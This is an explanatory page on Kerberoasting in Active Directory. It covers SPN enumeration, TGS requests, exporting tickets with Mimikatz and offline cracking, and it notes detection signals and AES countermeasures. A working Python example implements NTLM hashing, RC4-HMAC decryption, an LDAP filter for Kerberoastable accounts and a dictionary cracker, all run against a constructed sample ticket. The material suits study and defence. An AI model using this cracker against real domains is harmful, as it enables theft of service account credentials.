Kerberoasting is an attack technique that lets an attacker recover Active Directory service account passwords by cracking them offline. Because the guessing runs on the attacker's own machine against an exported ticket, it causes no failed logons or account lockouts; it is not invisible, though, since the ticket request itself is logged on the domain controller (Event ID 4769), and a burst of requests for RC4-encrypted tickets (encryption type 0x17) is the classic detection signal.
How Kerberoast works
- The attacker searches Active Directory for user accounts that have a servicePrincipalName (SPN) set. Any method works: PowerShell, plain LDAP queries, the scripts shipped with the Kerberoast toolkit, or tools such as PowerSploit. Only user accounts matter here; computer accounts have long random passwords that are not practical to crack.
- With the list of target accounts in hand, the attacker requests a service ticket (TGS) for each SPN from the domain controller. Any authenticated domain user may do this, and the KDC encrypts the ticket with a key derived from the service account's password (for RC4 tickets, the account's NTLM hash).
- Using Mimikatz, the attacker exports the service tickets from memory and saves them to files on disk.
- Once the tickets are saved to disk, the attacker feeds them to a password-cracking tool. The tool takes each candidate from a dictionary, converts it to an NTLM hash, and uses that hash as the key to try to decrypt the ticket. A wrong password fails the ticket's integrity check; when the check passes, the matching password is shown to the attacker in clear text.
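The following is an added worked example of the last two steps, not code from this page or from the kerberoast package. It implements the RC4-HMAC (etype 23) cipher that protects the ticket's encrypted part, formats it the way hashcat mode 13100 expects, and runs the dictionary attack the text describes. The ticket contents, the account name svc_sql, the realm CORP.LOCAL, the SPN and the wordlist are all constructed for the demonstration; a real ticket's encrypted part is a DER-encoded EncTicketPart, but the key derivation and the integrity check are exactly the ones a cracker performs.

```python
import hashlib
import hmac
import os
import struct

# Step 1 (assumption, not from the page): the LDAP filter that lists enabled
# user accounts carrying an SPN, i.e. the Kerberoastable targets.
SPN_USER_FILTER = ("(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)"
                   "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))")

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds often lack hashlib's md4."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & M32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1
            a = rol((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & M32, (B + b) & M32, (C + c) & M32, (D + d) & M32
    return struct.pack("<4I", A, B, C, D)


def ntlm(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC (etype 23) key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


TICKET_USAGE = 2  # Kerberos key-usage number for a ticket's EncTicketPart


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = TICKET_USAGE, confounder: bytes = None) -> bytes:
    """RFC 4757 encryption: output is HMAC-MD5 checksum || RC4(confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    conf = confounder if confounder is not None else os.urandom(8)
    checksum = hmac.new(k1, conf + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, conf + plaintext)


def crack_rc4_ticket(edata: bytes, wordlist, usage: int = TICKET_USAGE):
    """Offline step: hash each candidate to NTLM, decrypt, and let the HMAC say if it fits."""
    checksum, enc = edata[:16], edata[16:]
    for candidate in wordlist:
        k1 = hmac.new(ntlm(candidate), struct.pack("<I", usage), hashlib.md5).digest()
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        plain = rc4(k3, enc)
        if hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
            return candidate, plain[8:]  # strip the 8-byte confounder
    return None, None


def to_hashcat(user: str, realm: str, spn: str, edata: bytes) -> str:
    """Hashcat mode 13100 line: 16-byte checksum and encrypted part separated by '$'."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


# Constructed sample (not a real ticket): a stand-in for the encrypted part,
# protected with a weak service-account password. Fixed confounder keeps it repeatable.
SERVICE_PASSWORD = "Summer2019!"
SAMPLE_PLAINTEXT = b"EncTicketPart{cname=alice,sname=MSSQLSvc/sql01.corp.local:1433}"
SAMPLE_EDATA = rc4_hmac_encrypt(ntlm(SERVICE_PASSWORD), SAMPLE_PLAINTEXT, confounder=bytes(range(1, 9)))
WORDLIST = ["password", "Welcome1", "Password123", "Summer2019!", "Winter2020"]

if __name__ == "__main__":
    print(to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", SAMPLE_EDATA))
    pw, plain = crack_rc4_ticket(SAMPLE_EDATA, WORDLIST)
    print("recovered:", pw, plain)
```

The point to notice is why the attack is cheap: each guess costs one MD4 and three HMAC-MD5 operations plus an RC4 pass, nothing that slows an attacker down, and the HMAC verdict is unambiguous, so there is no interaction with the domain controller at all once the ticket is in hand. Tickets issued with AES (etype 17/18) use a PBKDF2-derived key and are far slower to crack, which is why forcing AES on service accounts and alerting on RC4 ticket requests are the usual countermeasures.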
pip3 install kerberoast
You can download the application from here.